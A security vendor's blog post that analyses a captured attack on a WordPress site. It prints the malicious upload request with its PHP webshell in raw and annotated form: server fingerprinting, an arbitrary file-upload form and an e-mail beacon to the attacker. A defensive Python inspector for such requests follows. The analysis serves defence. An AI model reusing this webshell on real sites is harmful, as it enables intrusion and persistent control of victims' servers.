Web App Security

Lessons from DarkLogic: Hacking WordPress


Ricardo Sanchez

July 28, 2020

According to different sources, the most popular Content Management System (CMS) for managing and deploying websites is WordPress. With features such as ease of use, page management, and an extensive universe of plugins to choose from, it's not difficult to see why it is a customer favorite.

The flip side of popularity and wide customer usage is the security risk to which those customers are exposed. Hackers typically invest their time and effort in widely popular systems, so that a single attack is more effective and covers a wider attack surface. According to ZDNet, more than 90% of hacked CMS sites in 2018 were WordPress sites.

We at FiberWolf protect customers from different industries with our DarkLogic Continuous Security software. Recently, DarkLogic was able to pick up, in the wild, several different WordPress attacks performed against our customers. With DarkLogic we can examine the payload of an attack to further investigate the hacker's motives and intentions. Let's take a look at one attack performed against a WordPress site this past week.

This particular attack is performed via Command Injection, which is actually #1 in the Top 10 attacks performed against web applications today. Let's examine the payload (identity removed to protect the end user):

       POST xxxxxx/upload.php HTTP/1.1
       Host: xxxxx
       Connection: keep-alive
       Accept-Encoding: gzip, deflate
       Accept: */*
       User-Agent: python-requests/2.23.0
       Content-Length: 1195
       Content-Type: multipart/form-data; boundary=6686f09ce766e678e1b43c52e109caf2

       --6686f09ce766e678e1b43c52e109caf2
       Content-Disposition: form-data; name="qqfile"; filename="xxxxxx"
       Content-Type: multipart/form-data

       ?php $str = 'xxx';echo base64_decode($str); ? titleghghgh/title ?php echo 'xxxv7up uname'.'br'.'uname:'.php_uname().'br'.$cwd = getcwd(); Echo 'center form method="post" target="_self" enctype="multipart/form-data" input type="file" size="20" name="uploads" / input type="submit" value="upload" / /form /center/td/tr /tablebr'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "scriptalert('upload Done'); . . /scriptbUploaded !!!/bbrname : ".$_FILES['uploads']['name']."brsize : ".$_FILES['uploads']['size']."brtype : ".$_FILES['uploads']['type']; } ? ?php $ip = getenv("REMOTE_ADDR"); $ra44 = rand(1, 99999); $subj98 = " Bot v6 xxxx |$ip"; $email = "xxxx@gmail.com"; $from = "From: xxx@xxxx.com"; $a45 = $_SERVER['REQUEST_URI']; $b75 = $_SERVER['HTTP_HOST']; $m22 = $ip . ""; $msg8873 = "$a45 $b75 $m22"; mail($email, $subj98, $msg8873, $from); ?

As you may have noticed, the hacker injected malicious PHP code inside the request. Let's break the PHP code out into a more human-readable format (the HTML tags around it were stripped in the capture, which is why words such as "br" and "center" appear bare):

       // Decode and print an obfuscated (base64) string
       $str = 'xxx';
       echo base64_decode($str);

       // Fingerprint the host: OS/kernel details and the current working directory
       echo 'xxxSpyv7up uname'.'br'.'uname:'.php_uname().'br'.$cwd = getcwd();

       // Render an HTML upload form that posts back to this same script
       echo 'center form method="post" target="_self" enctype="multipart/form-data" input type="file" size="20" name="uploads" / input type="submit" value="upload" / /form /center/td/tr /tablebr';

       // Save any file submitted through that form under its original name and confirm
       if (!empty ($_FILES['uploads'])) {
           move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
           echo "scriptalert('upload Done'); . . /scriptbUploaded !!!/bbrname : ".$_FILES['uploads']['name']."brsize : ".$_FILES['uploads']['size']."brtype : ".$_FILES['uploads']['type'];
       }

       // Phone home: e-mail the compromised host's IP, request URI and hostname to the attacker
       $ip = getenv("REMOTE_ADDR");
       $ra44 = rand(1, 99999);
       $subj98 = " Bot v6 xxxx |$ip";
       $email = "xxxx@gmail.com";
       $from = "From: xxx@xxxx.com";
       $a45 = $_SERVER['REQUEST_URI'];
       $b75 = $_SERVER['HTTP_HOST'];
       $m22 = $ip . "";
       $msg8873 = "$a45 $b75 $m22";
       mail($email, $subj98, $msg8873, $from);

Interesting PHP code! It appears to be trying to plant a malicious file via an upload vulnerability, and then e-mail the attacker a notice of the hacked IP (the hacker's e-mail address has been obfuscated as a security measure).
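As an added defender-side illustration (not code from the post or from DarkLogic), here is a small Python inspector that parses a multipart upload request like the one above and reports the indicators a WAF rule or log review would flag: a scripted client, a server-executable file extension, a PHP open tag inside the uploaded part, and webshell-style function calls. The sample request, its path, boundary and PHP stub are constructed for the example.

```python
import re

# Constructed sample modelled on the capture above; path, boundary and PHP stub are made up.
SAMPLE_REQUEST = (
    b"POST /wp-content/uploads/upload.php HTTP/1.1\r\n"
    b"User-Agent: python-requests/2.23.0\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n"
    b"\r\n"
    b"--abc123\r\n"
    b'Content-Disposition: form-data; name="qqfile"; filename="shell.php"\r\n'
    b"Content-Type: multipart/form-data\r\n"
    b"\r\n"
    b"<?php echo php_uname(); ?>\r\n"
    b"--abc123--\r\n"
)
PHP_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
SHELL_FUNCS = re.compile(rb"\b(move_uploaded_file|base64_decode|mail|php_uname|getcwd)\s*\(")

def parse_multipart(raw):
    # Returns (header dict, [(part headers, part body), ...]) for a raw request.
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        k, _, v = line.partition(b":")
        headers[k.strip().lower()] = v.strip()
    m = re.search(rb"boundary=([^;\s]+)", headers.get(b"content-type", b""))
    parts = []
    for chunk in body.split(b"--" + m.group(1)) if m else []:
        chunk = chunk.strip(b"\r\n")
        if chunk and chunk != b"--":  # skip the leading empty piece and the closing "--"
            parts.append(chunk.partition(b"\r\n\r\n")[::2])
    return headers, parts

def inspect_upload(raw):
    # Returns the indicators a WAF rule or log review would flag on this request.
    headers, parts = parse_multipart(raw)
    ua = headers.get(b"user-agent", b"")
    findings = ["scripted client: " + ua.decode()] if ua.startswith(b"python-requests") else []
    for phead, pbody in parts:
        fn = re.search(rb'filename="([^"]*)"', phead)
        ext = fn.group(1).rsplit(b".", 1)[-1].lower().decode() if fn else ""
        if ext in PHP_EXTENSIONS:
            findings.append("server-executable extension: ." + ext)
        if PHP_TAG.search(pbody):
            findings.append("PHP open tag inside uploaded file")
        funcs = sorted({f.decode() for f in SHELL_FUNCS.findall(pbody)})
        if funcs:
            findings.append("webshell-style calls: " + ", ".join(funcs))
    return findings
```

Run `inspect_upload(SAMPLE_REQUEST)` to see all four indicators fire on the constructed request; on a benign image upload the list comes back empty.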

It is important to keep your WordPress site up to date with the latest security patches. Learn more about how DarkLogic can help you and send us a message.